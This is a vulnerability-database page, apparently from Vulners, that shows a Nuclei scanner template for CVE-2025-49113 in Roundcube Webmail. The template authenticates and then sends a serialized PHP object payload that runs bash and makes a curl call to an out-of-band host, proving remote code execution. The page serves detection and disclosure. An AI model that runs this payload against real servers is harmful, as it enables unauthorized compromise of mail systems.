Lucene search
K

Roundcube Webmail - Remote Code Execution

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 1283 Views

Roundcube Webmail allows remote code execution due to unsanitized parameter, affecting multiple versions.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-49113
19 Aug 202502:35
githubexploit
GithubExploit
Exploit for CVE-2025-49113
18 Jun 202519:10
githubexploit
GithubExploit
Exploit for CVE-2025-49113
19 Sep 202506:07
githubexploit
GithubExploit
Exploit for CVE-2025-49113
11 Jul 202513:19
githubexploit
GithubExploit
Exploit for CVE-2025-49113
10 Jun 202515:21
githubexploit
GithubExploit
Exploit for Deserialization of Untrusted Data in Roundcube Webmail
11 Apr 202621:54
githubexploit
GithubExploit
Exploit for CVE-2025-49113
3 Jun 202519:04
githubexploit
GithubExploit
Exploit for CVE-2025-49113
19 Sep 202506:07
githubexploit
GithubExploit
Exploit for CVE-2025-49113
22 Jun 202516:13
githubexploit
GithubExploit
Exploit for CVE-2025-49113
11 Jul 202513:19
githubexploit
Rows per page
id: CVE-2025-49113

info:
  name: Roundcube Webmail - Remote Code Execution
  author: rootxharsh,iamnoooob,pdresearch,Ademking
  severity: critical
  description: |
    Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization.
  impact: |
    Authenticated attackers can exploit unsafe deserialization in file upload handling to execute arbitrary PHP code, achieving complete server compromise.
  remediation: |
    Upgrade Roundcube Webmail to version 1.5.10, 1.6.11, or later that properly validates deserialization operations.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-49113
    - https://fearsoff.org/research/roundcube
    - https://github.com/advisories/GHSA-8j8w-wwqc-x596
    - http://www.openwall.com/lists/oss-security/2025/06/02/3
    - https://roundcube.net/news/2025/06/01/security-updates-1.6.11-and-1.5.10
    - https://github.com/roundcube/roundcubemail/commit/0376f69e958a8fef7f6f09e352c541b4e7729c4d
    - https://github.com/roundcube/roundcubemail/commit/7408f31379666124a39f9cb1018f62bc5e2dc695
    - https://github.com/roundcube/roundcubemail/commit/c50a07d88ca38f018a0f4a0b008e9a1deb32637e
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2025-49113
    cwe-id: CWE-502
    epss-score: 0.89462
    epss-percentile: 0.99768
  metadata:
    verified: true
    max-request: 3
    shodan-query: http.component:"roundcube"
    fofa-query: "roundcube_sessid"
  tags: cve,cve2025,roundcube,rce,deserialization,intrusive,vkev,vuln,kev

flow: |
    if (http(1)) {
    http(2) && http(3) && http(4)
    }

variables:
  username: "{{username}}"
  password: "{{password}}"
  filename: "{{randbase(9)}}"
  oast: "{{interactsh-url}}"
  oast_new: "{{replace(oast,'.','\\\\x2e')}}"

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    extractors:
      - type: regex
        name: major
        group: 1
        regex:
          - '"rcversion":(\d)'
        internal: true

      - type: regex
        name: minor
        group: 1
        regex:
          - '"rcversion":\d\d(\d)'
        internal: true

      - type: regex
        name: patch
        group: 1
        regex:
          - '"rcversion":\d\d\d(\d+)'
        internal: true

      - type: dsl
        name: version
        dsl:
          - major + "." + minor + "." + patch
        internal: true

      - type: dsl
        dsl:
          - '"Roundcube Version: "+ version'
        internal: true

    matchers:
      - type: dsl
        name: version_check
        dsl:
          - compare_versions(version, '< 1.5.10') || (compare_versions(version,'>= 1.6.0') && compare_versions(version, '< 1.6.11'))
          - contains_any(body, "roundcube", "Roundcube")
          - contains(body, "rcversion")
        condition: and

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: nonce
        group: 1
        regex:
          - '"request_token":"(.*?)"'
        internal: true

  - raw:
      - |
        POST /?_task=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _token={{nonce}}&_task=login&_action=login&_timezone=Asia%2FDubai&_url=&_user={{username}}&_pass={{password}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains(location, "task=mail")'
        condition: and
        internal: true

  - raw:
      - |
        POST /?_task=settings&_framed=1&_remote=1&_from=!";O:16:"Crypt_GPG_Engine":1:{s:8:"_gpgconf";s:{{44 + len(oast_new)}}:"bash+-c+"printf+'curl+{{oast_new}}'>/tmp/p;bash+/tmp/p";";}}&_action=upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxc4v9AJAwaNTZhjk

        ------WebKitFormBoundaryxc4v9AJAwaNTZhjk
        Content-Disposition: form-data; name="_file[]"; filename="firstfile|a:1:{s:57:\"a\";}"
        Content-Type: image/png

        {{base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg==')}}
        ------WebKitFormBoundaryxc4v9AJAwaNTZhjk--

    matchers:
      - type: dsl
        name: exploit_check
        dsl:
          - 'status_code == 200'
          - 'contains(interactsh_protocol, "dns")'
          - 'contains_all(body, "add2attachment_list", "rcmfile", "mimetype", "firstfile")'
        condition: and
# digest: 4a0a00473045022100f504abe9b5344f02b6e521c0dbf08d5e2121b91bed69b94b6b7c61029a537ccd02203a760fada14faea88d419696dde483a635aef5cef63ad8b7baa18fb977250d93:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8High risk
Vulners AI Score8
CVSS 3.18.8 - 9.9
EPSS0.89462
SSVC
1283